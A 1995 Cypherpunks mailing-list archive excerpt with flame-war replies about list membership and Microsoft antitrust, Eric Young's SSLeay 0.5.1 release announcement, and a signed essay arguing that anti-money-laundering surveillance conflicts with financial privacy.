> > > syndrome.  You really should have it checked out before you harm yourself 
> > > and possibily others.
> > 
> > Thank you for the pseudopsychology, but really, all you've done is
> > further confirm my diagnosis of "non-contributing asshole".
> > 
> > When was the last time you did anything to actually help spread
> > cryptography, eh?
> > 
> > If you'll pardon me, I have crypto code to get back to.
> > 
> > .pm
> > 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 20 Dec 95 19:15:28 PST
To: ECafe Anonymous Remailer <cpunk@remail.ecafe.org>
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <199512202018.UAA02824@pangaea.ang.ecafe.org>
Message-ID: <Pine.BSD.3.91.951221021253.27593D-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



    OK, you're afraid of AT&T's lawyers. give me a break --who's chicken?
  they are not the government, they can not put you in jail and charges
  would never stick.
    both Blaze and Weinstein are bound by their employment contracts from 
    discussing political hot-potatoes. Weinstein did state rather 
  emphatically the opinions of the crew at Netscape did not conform to
  the apparently misguided statements of the dupe of government.
    blaze has sent plenty of code our way --even obtaining permission from
  at&t which is a real big brother.

    Have you been arrested and charged for crypto (non-export)?  - I have.
    Have you been arrested and charged for technology export?  - I have.
    Have you been raided more than once by the Feds?  - I have.
    Have you been excluded from at&t machines except murray hill and other
  labs because system managers don't like programmers knowledgable in
  crypto and kernels ? - I have.

    Did I ever break into systems or alter data --no, that's not ethical.
    Could I? -yes, presumably some.

    "Membership" in Cypherpunks is not predicated on supporting _your_
  political agenda or beliefs. In fact, too much bandwidth is expended
  on arguing about political policy. I agree with Perry that postings 
  should be crypto design and implementation. 

    I have suggested that even announcements of crypto political
  activities should be put up like John Young posts: one paragraph
  synopsis and a reference to get the whole thing, but no discussion 
  --take it elsewhere.

    As for the attacks on Perry, they are inexcusable. You obviously 
  have no idea what crypto Perry codes.

    I have not published crypto code for a long time.  I am wrapping up, 
  after a _long_ hiatus, one which will really take their socks off --with
  their shoes still on.  I'd love to release it to public domain, but____

    What am I going to do with it? dunno, probably put the tape on the 
  shelf; I escaped the hard hand of justice, a poor man, the last time 
  when I tried to enter the code in evidence. Now I am "20 years older and
  deeper in debt" [Tennessee Ernie style]; is it worth it? I've done my
  time, and code has a signature. I think I would prefer to enjoy my five
  children and a few grandchildren. But it has been a good exercise....

    No, Mr. ECafe Anonymous _chicken_, you're the despicable party. Put 
  your imprint on your attacks and accusations: the Constitution says you 
  are entitled to _face_ your accusers.

    If you want to argue about constitutional or God given rights --do it in 
  other forums. If you want to denigrate blaze, weinstein, perry, and maybe 
  even tcmay, just drop yourself off the cpunk mailing list.

    meanwhile, get out of our collective faces and let us do a little 
  code, I intend to finish my work, and then I can have a depression
  trying to decide whether I want to go the round, again. 

    ATTILA
		==============================

On Wed, 20 Dec 1995, ECafe Anonymous Remailer wrote:

> I'm not trying to start a flame war. I'm
> sure these people are very smart and have
> written lots of good code. I'm sure they're
> very nice and never kick their dogs.  I'm
> just tired of people defending them as
> cypherpunks.
> 
> They aren't cypherpunks.
> 
> Neither has come out against GAK. They
> both carefully avoid commiting to any
> statement. They want us to think they're
> "one of us" but they don't want to be
> pinned down because they are double dipping
> on both sides of the fence.
> 
> Blaze even does "research" on GAK. See
> his web page for evidence. Also the TIS
> report. The fact that he found a bug in
> clipper doesn't change this. It proves
> it.  He works for the government, via att.
> 
> Weinstein is actively promoting GAK by
> working at the company that the government
> has chosen to bring it to you now that
> att has failed.
> 
> WHY IS EVERYONE SO QUICK TO DEFEND THESE
> PEOPLE? DO THEY HAVE YOU ALL SO IMPRESSED
> WITH THEIR MASTERS DEGREES THAT YOUR AFRAID
> TO LOOK CLOSELY?
> 
> No, I did not post the RSA patch. I wouldn't
> touch any of that code with a 5 meter pole.
> 
> To the guy who says write code: I've
> written plenty of code. Clue: your probably
> running some of it right now.
> 
> I'm anonymous because I've seen FIRST HAND
> what the att lawyers do to people who
> tell the wrong kind of truth.
> 
> Want me to be a 'nym. OK.
> 
> s/ Bill Gates (he has good lawyers that
> can handle att and netscape)
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 20 Dec 95 20:49:27 PST
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Vladimir Z. Nuri's fallacious defense of MS
In-Reply-To: <199512210204.SAA26757@netcom20.netcom.com>
Message-ID: <Pine.BSD.3.91.951221035112.27593J-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Without forcing everybody to search the interline comments.

    1)	you obviously have no concept of anti-trust or anti-competitive 
	law, practice or the public interest it represents. I wrote my
	thesis on government regulation of monopoly v. monopoly 
        franchises such as utilities.

    2)  market domination can, and generally does, stifle competition, 
	but it also kills innovation of alternatives.  Software companies
	are too busy kissing arse with Bill, and threatened by Bill, 
	to release software on other systems say unix or os/2. 

	a perfect example is Corel.  Corel was _very_ enthusiastic to 
	release for OS/2, in fact they were ported to OS/2 before W95
	released.  Shortly after the announcement, the honcho reversed
	positions and canceled Rev 6 for OS/2 stating that Rev 2.5 which
	has existed for some time, was "adequate" for OS/2. I am not going
	to expose my inside source, as their will be retribution.

    3)  you are totally ignoring the comments on anti-thrust and restraint
	of trade. In general market terms, anti-thrust is less important
	than restraint of trade --Bill _clearly_ violates the rules on
	restraint of trade, and therefore should be dismembered to avoid
	lack of innovation as in #2 above. 

    4)	you clearly have no concept of American free market policy. Yes, 
	you may be very successful, even filthy rich, but when you 
	stretch your rights to clearly offend the public interest, then 
	anti-trust and restraint of trade laws serve the _needs_ of a 
	free and _competitive/innovative_ market.  

	America does not serve dinner to merchants who rape, pillage, and 
	burn --as Bill Gates has crushed his opponents; the barbarians 
	are punished.  There are grounds for criminal charges in Bill's 
	actions.

    5)	you are incorrect in your assumptions that Gates was sued 
	anonymously. In the initial action by the DOJ, competitors were 
	_asked_, by subpoena, for factual information by the DOJ.  The
	_DOJ_ provided the shield in so much as Bill's barbarian actions
	were of sufficient interest that evidence providers desired and
	were given protection --not much different than the Federal
	Witness Protection program. 

	when CI$ and the rest banded together to protest Bill's obvious 
	restraint of trade and stonewalling on hooks to Win95 for three 
        months after Win95 released, they did not, and _could_ not, do 
        so anonymously.

    6)	how much is Bill paying _you_ for your efforts?  You obviously have
	too much of an interest in the commercial outcome to be so ignorant.
        
    7) 	Your beliefs are one thing --state 'em, but don't speak for America
	until you know the definition of the "public interest" and have 
	some concept of anti-trust and restraint-of-trade legislation and
	court rulings which have set the guidelines.  clutch it in,
	_after_ your brain is in gear. 

    8)	no, I am not a liberal by any means. I am somewhere to the right 
	of the Libertarians, but definitely not an anarchist either.

      ANY FURTHER COMMENTS --FORWARD TO ALT.FLAME 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 20 Dec 95 21:20:30 PST
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: An Apology to Mr. Merzger
In-Reply-To: <Pine.OSF.3.91.951220210124.8832D-100000@Joyce-Perkins.tenet.edu>
Message-ID: <Pine.BSD.3.91.951221051731.27593M-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



    congratulations, Dan.  It takes a strong man to admit mistakes, and
courage to apologize! 

	attila


On Wed, 20 Dec 1995, Dan Harmon wrote:

> 
> Perry and members of this list,
> 
> I want to publicly apologize to Mr. Metzger. On reviewing the events of the
> day, it seems that I misunderstood a post by Perry. It seems that I was 
> missing a previous post that was being referenced. As to the 
> misunderstood message, I have to now agree with Perry and his reponse.
> 
> Please accept this apology.
> 
> Dan
>  
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 20 Dec 95 23:55:10 PST
To: cypherpunks@toad.com
Subject: Cypherpunks resumes?
Message-ID: <199512210755.IAA28350@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Is there any chance of seeing a Cypherpunks 'Rogues Gallery' of sorts
in the archives anytime soon?  It would be nice to see a face connected
to the postings here.  Some of us don't get the chance of getting out
west for the parties, The only other thing I know about Tim May besides
being one of the Fathers of the Cypherpunks is that he was a naked hippie
in a hot tub at some party that Robert Hettinga was at some weeks ago,

That doesn't paint a good picture for me.

Thanks,

A.E.N.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Wed, 20 Dec 95 23:43:12 PST
To: ssl-users@mincom.oz.au
Subject: SSLeay 0.5.1
Message-ID: <Pine.SOL.3.91.951221173815.14679D-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain




SSLeay 0.5.1 is now available.

It should be quite stable and has documentation for the lower level
cryptographic routines.

It is incompatible with the previous version but has no global variables
of consequence so it should be a much nicer starting point for threaded
libraries.  The library should have no memory leaks and the general
cryptographic functionality has been filled out more.

Tim Hudson <tjh@mincom.oz.au> will be updating the applications
available on ftp.psy.uq.oz.au in the next few days.

I leave for an 11 week holiday today so please address any problems and
questions to the ssl-users@mincom.oz.au mailing list (if it is of
general interest) or to ssleay@mincom.oz.au which goes to both
myself and Tim Hudson (who will be fixing any bugs while I'm away).

Anouncing software and then leaving for 3 months would probably not
normally be considered a good practice but 0.5.0 has been tested for
the last week or so and I have faith in Tim Hudson's ability to fix 
bugs after doing pre-alpha testing for the last 6 months :-)

As per usual, the primary ftp site is
	ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL
	http://www.psy.uq.oz.au/~ftp/Crypto

Documentation on the demo application is sparse but I hope Tim Hudson
will be able to fill in the gaps while I'm away :-)

eric <eay@mincom.oz.au>
--
		SSLeay v 0.5.1 21/12/955
		Copyright (c) 1995, Eric Young
		All rights reserved.

This directory contains Eric Young's (eay@mincom.oz.au) implementation
of SSL and supporting libraries.

The current version of this library is available from
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/SSLeay-x.xx.tar.gz

There are patches to a number of internet applications which can be found in
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps/

A Web page written by Tim Hudson <tjh@mincom.oz.au> can be found at
http://www.psy.uq.oz.au/~ftp/Crypto

This Library and programs are FREE for commercial and non-commercial
usage.  The only restriction is that I must be attributed with the
development of this code.  See the COPYRIGHT file for more details.
Donations would still be accepted :-).

The package includes

libssl.a:
	My implementation of Netscapes SSL v 2 protocol.  This library
	implements the SSL protocol.

libcrypto.a:
	General encryption and X509 stuff needed by SSL but not
	actual logically part of it.  It include routines for the following:
	libdes - My libdes DES encryption package which has been floating
		around the net for a few years.  It includes 15
		'modes/variations' of DES (1, 2 and 3 key versions of ecb,
		cbc, cfb and ofb; pcbc and a more general form of cfb and ofb)
		a fast crypt(3), and routines to read passwords from the
		keyboard.
	RC4 encryption,
	IDEA encryption - 4 different modes, ecb, cbc, cfb and ofb.
	MD5 and MD2 message digest algorithms,
	SHA (SHA-0) and SHA-1 message digest algorithms,
	RSA encryption/decryption/key generation.  There is no limit
		on the number of bits.
	Diffie-Hellman key-exchange/key generation.  There is no limit
		on the number of bits.
	X509 encoding/decoding into/from binary ASN1 and a
		PEM based ascii-binary encoding which supports encryption with
		a private key.

Programs in this package include
	enc	- a general encryption program that can encrypt/decrypt using
		one of 17 different cipher/mode combinations.  The
		input/output can also be converted to/from base64
		ascii encoding.
	dgst	- a generate message digesting program that will generate
		message digests for any of md2, md5, sha (sha-0) or sha-1.
	asn1parse - parse and display the structure of an asn1 encoded
		binary file.
	rsa	- Manipulate RSA private keys.
	dh	- Manipulate Diffie-Hellman parameter files.
	crl	- Manipulate certificate revocation lists.
	x509	- Manipulate x509 certificates, self-sign certificates.
	req	- Manipulate PKCS#10 certificate requests and also
		  generate certificate requests.
	genrsa  - Generates an arbitrary sized RSA private key.
	gendh	- Generates a set of Diffie-Hellman parameters, the prime
		will be a strong prime.
	ca	- Create certificates from PKCS#10 certificate requests.
		This program also maintains a database of certificates
		issued.
	verify	- Check x509 certificate signatures.
	speed	- Benchmark SSLeay's ciphers.
	s_server - A test SSL server.
	s_client - A test SSL client.
	s_time	 - Benchmark SSL performance of SSL server programs.
	
Documents included are
	A Postscript and html reference manual
	(written by Tim Hudson tjh@mincom.oz.au).
	A list of text protocol references I used.
	A initial version of the library manual.

To install this package, read the INSTALL file.
This library has been compiled and tested on Solaris 2.[34] (sparc and x86),
SunOS 4.1.3, DGUX, OSF1 Alpha, HPUX 9, AIX 3.5(?), IRIX 5.[23],
LINUX, NeXT (intel). 

For people in the USA, it is possible to compile SSLeay to use RSA
Inc.'s public key library, RSAref.  From my understanding, it is
claimed by RSA inc. to be illegal to use my public key routines inside the USA.
Read doc/RSAref.doc on how to build with RSAref.

Read the documentation in the doc directory.  It is quite rough,
but it lists the functions, you will probably have to look at
the code to work out how to used them.  I will be working on
documentation.  Look at the example programs.
There should be a SSL reference manual which is being put together by
Tim Hudson (tjh@mincom.oz.au) in the same location as this
distribution.  This contains a lot more information that is very
useful.  For a description of X509 Certificates, their use, and
certification, read rfc1421, rfc1422, rfc1423 and rfc1424.  ssl/README
also goes over the mechanism.

We have setup some mailing lists for use by people that are interested
in helping develop this code and/or ask questions.
    ssl-bugs@mincom.oz.au
    ssl-users@mincom.oz.au
    ssl-users-request@mincom.oz.au

This library is reasonable stable now.  Version 0.5 has had extensive
rewriting since version 0.4.  The purify package has been used extensively
and I believe most if not all memory leaks have been removed.
There are no writable global variable so a multi-threaded/DLL version of
the library should be quite simple to write.

Look at TODO for a list of thinks I know I still need to do.

eric (December 1995)

Eric Young (eay@mincom.oz.au)
86 Taunton St.
Annerley 4103.
Australia.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdavidm@iconz.co.nz (David Murray)
Date: Wed, 20 Dec 95 23:24:52 PST
To: cypherpunks@toad.com
Subject: The War on Some Money [long]
Message-ID: <pnr416938529b@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[Yes - money laundering _again_.]

I want to advance two theses:

1. That the interest and activities of governments in fighting money-laundering
is directly contrary to the interest and activities of those seeking to
develop anonymous digital commerce;

2. That there is a related, if not underlying, conflict between the rhetoric
of concealment and the rhetoric of privacy.

<Of course, what _does_ underly all of this is individual vs. state -- but that
is pretty much a given.>

If the push for anonymous digital commerce is exemplified by the Cypherpunks
(and let's pretend it is), the battle against money-laundering is being led by
the Financial Action Task Force (FATF), an autonomous international entity,
set up by the G7 as part of the orgy of post-cold-war co-operation between
States on this issue. The UN, G7, OAS, Commonwealth, EU and a host of supra-
national bodies have called for co-ordinated action on stamping out dirty
money. And in an unprecendented fashion, States have responded. There are over
100 States that either have or are considering the criminalisation of money-
laundering. These include, by and large, the tax havens of Europe, the
Carribbean and the South Pacific.

So what is criminal money laundering? Concealing the source of funds that one
knows come from serious crime. Three comments about this formulation:

1. The state of mind required is knowledge, although this knowledge can be
inferred from objective facts (and knowledge tests in criminal definitions are
notoriously elastic).

2. The source of funds must be serious crime. The early UN declaration only
referred to drug dealing, but since 1990 there has been a move to widen this
to all serious crime. As to what constitutes serious crime, this is still
somewhat up for grabs. Some of the BSA's statements about software piracy
being the drug dealing of the nineties, and linking piracy with organised
crime can be seen as a strategy to position large scale intellectual property
theft as serious crime. More ominous (at least for the relationship of
citizen and state) is the occasional reference to tax evasion in the same
breath as serious crime.

3. This is because the serious crime need not be committed in the same country
as the money laundering. This makes sense for conventional serious crime (to
coin a phrase), but if tax evasion is included represents a major departure
from the convention that the courts of one country will not enforce the 
taxing statutes of another.

Note also the possibility that fraud might be serious crime, which, since
the test of fraud is dishonesty, directly brings the competing ethical (or
rhetorical) systems into conflict. But more of this below.

The key feature of the new supra-national regime, however, is not a more or
less co-ordinated criminal law (there are some marked variations on
the above scheme), but the new surveillance approach to the financial system.

The most obvious signs of this are the requirement of financial institutions
to "know your customer" (which includes an explicit prohibition of anonymous
accounts) and to report "suspicious" transactions. But the approach goes much
further. The FATF's chilling Forty Recommendations (on which the global
approach is largely based) urges countries to "further encourage in general
the development of modern and secure techniques of money management, including
increased use of cheques, payment cards, direct deposit of salary cheques, and
book entry recording of securities, as a means to encourage the replacement of
cash transfers." [This is taken from a synopsis of the Recommendations.] In
case anyone should think this is based on the insecurity to the _customer_ of
cash and bearer securities, the FATF suggests countries (i.e. Governments) may
like to consider monitoring all domestic financial transactions with a view
to building databases for computer analysis -- such databases to be 
appropriately secured from unauthorised access, of course.

So there we have it. The FATF wants a cashless, book entry, universally
monitored financial system based on verified True Names. Some Cypherpunks want
a cash based, bearer certificate, mathematically unmonitorable financial
system revolving around impenetrable pseudonyms.

Another way to put this is that Cypherpunks are for privacy, but the FATF is
against concealment.

Three arguments are often made for the attack on money laundering.

1. Money laundering leads to the corruption of societies and the undermining
of institutions and States. This seems to be putting the cart before the horse,
somewhat. Even if you consider money laundering as an inextricable part of
rendering crime organised, the crimes usually cited (drug dealing, 
environmental crime, and the smuggling of cultural artifacts [!]) could be
decriminalised relatively easily. And of course you could always abolish the
State :-)

2. Money laundering puts the financial system at risk. (This, of course, is why
the financial institutions used in the Pizza Connection money laundering
chain (Merrill Lynch, E F Hutton, Bankers Trust, Barclays, Chase Manhattan,
Chemical Bank, Citibank, American Express and Thomas Cook. Bank of Nova Scotia,
Ueberseebank (Switzerland)) have without fail spectacularly collapsed.) In so
far as this is a result of legislation providing for the forfeiture to the
State of the proceeds of crime, another solution is clearly available.

3. The War on Drugs has been a failure, because it isn't in anyone in the drug
distribution chain's interest to assist authorities. The financial system is
organised crime's exposed flank. (As an(other) aside, it is often mentioned
(asserted?) that terrorists are turning to drug dealing etc to finance their
terror campaigns. I'm not sure whether this is intended to combat the "drug
dealers are just businessmen" argument, or the "terrorists are just patriots"
one. Perhaps both.)

[Don't get me wrong. I'm not saying Statists are bad because drug dealers are
good. I realise that reasonable people can differ as to the trade off between
civil liberties and the protection of the State. I know people who think that
it is all right to let the Police randomly breath test drivers in order to
decrease road deaths. So I can easily imagine people might feel having to
front up with two types of ID to open a bank account is a small price to pay
to prevent the violence and misery of drug addiction. I happen to think both
sets of people are wrong, and dangerously so.]

So governments fight money laundering to make it harder for criminals to enjoy
the wealth governments can't stop them making. As a side effect, governments
gain valuable intelligence about everyone's everyday finances. And we might
as well look at cracking down on those evil tax evaders while we're at it...

Well -- even I'm willing to admit this summary is a tad glib. It misses
something important about attitudes to secrecy: whether secrecy is about
privacy or concealment.

Michael Froomkin often [:-)] cites Sissela Bok on the danger of secrets
inappropriately kept (see e.g. A. Michael Froomkin, "Anonymity and its
Enmities," 1995 J. Online L. art. 4, par. 51) -- and certainly the overtones
of locked doors, masks, whispers and shadows makes "secret" itself a suspect
word. To be open is almost always good; to be secretive is definitely
always bad.

This sense of the inherent evil of secrets (dark secrets, guilty secrets) runs
deep. Take the Equiticorp criminal trial (a local cause celebre of a few years
ago) where executives of a company that failed spectacularly after the '87
crash were charged with (inter alia) conspiracy to defraud. The executives in
question had caused a large sum of money of (at that time) completely unknown
provenance (the so called H-Fee) to be paid to themselves through a series of 
companies in tax-haven/banking secrecy jurisdictions. The judge (there was no
jury) found that, because no one had offered an honest reason to use such a 
structure, it could only have been for the purpose of concealment of the
source of the money from those who may have had a legitimate interest in
determining it (IRD, auditors etc.). This amounted to dishonesty, and the
charge of conspiracy to defraud was made out.

Note the reasoning here: a secret without a reason is concealment; concealment
is dishonest. (Cypherpunks would reason exactly oppositely: a secret is an
expression of privacy; privacy is good.)

We can extend the concealment reasoning in an interesting way: concealment ->
dishonesty -> fraud -> serious crime + concealment -> money laundering. So
widespread concealment can (conceivably) give rise to an offence of money
laundering with no other illegal act. The very fact that the State has an
interest in detecting money laundering strengthens that first link: concealment
- -> dishonesty.

For the cypherpunks, of course, privacy -> nothing at all. Secrecy=privacy is
the default. Secrecy=concealment is a red herring.

This is not the forum to recite the virtues of privacy. So I'll leave you [at
last, they cry!] with a sugestion as to its main (rhetorical) vice: privacy
is opposed to public, and public is (usually) good.

I'll go further. In the same way that "secret" gives rise to a cascade of
negative associations, "public" gives rise to a chain reaction of happy, if
not down right noble, thoughts: the public good; public service; the public's
right to know; and, of course, the republic itself. Private (and privacy), on
the other hand, gains meaning from its distinction from public -- it is
_inherently_ negative.

All this is so much old rope for those who reject the linguistic turn in
philosophy, but I find it a useful way of thinking about trends. And we are
seeing trends towards individuality, the rejection of the collective, the
privatisation of what once was public. Part of this will be the reversal
of the privilegeing of public over private, and the consequent/connected move
from secrecy=concealment to secrecy=privacy.

And a tangble manifestation of all that will be the rise of anonymous digital
commerce, and the abandonment of The War on Some Money.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNkJOVlo3j8JHzalAQGA/gP8D1mKUVyzybOVuI2AknuznciwghtvndH9
I0GtFnti8zFANMo6LIqb5/Hlz/XDTG6SFZR5D9omFlAd/J781pInaiEtTfXr/y+M
BXOppcvXfo28adGR5bgi+JLoZE9XQ511Qrz+HKi7Oa47LudySpRHkd/THM1Wamnw
9aWkxh5JOXs=
=FoHd
-----END PGP SIGNATURE-----

[Palmtop News Reader - Beta Version 3]





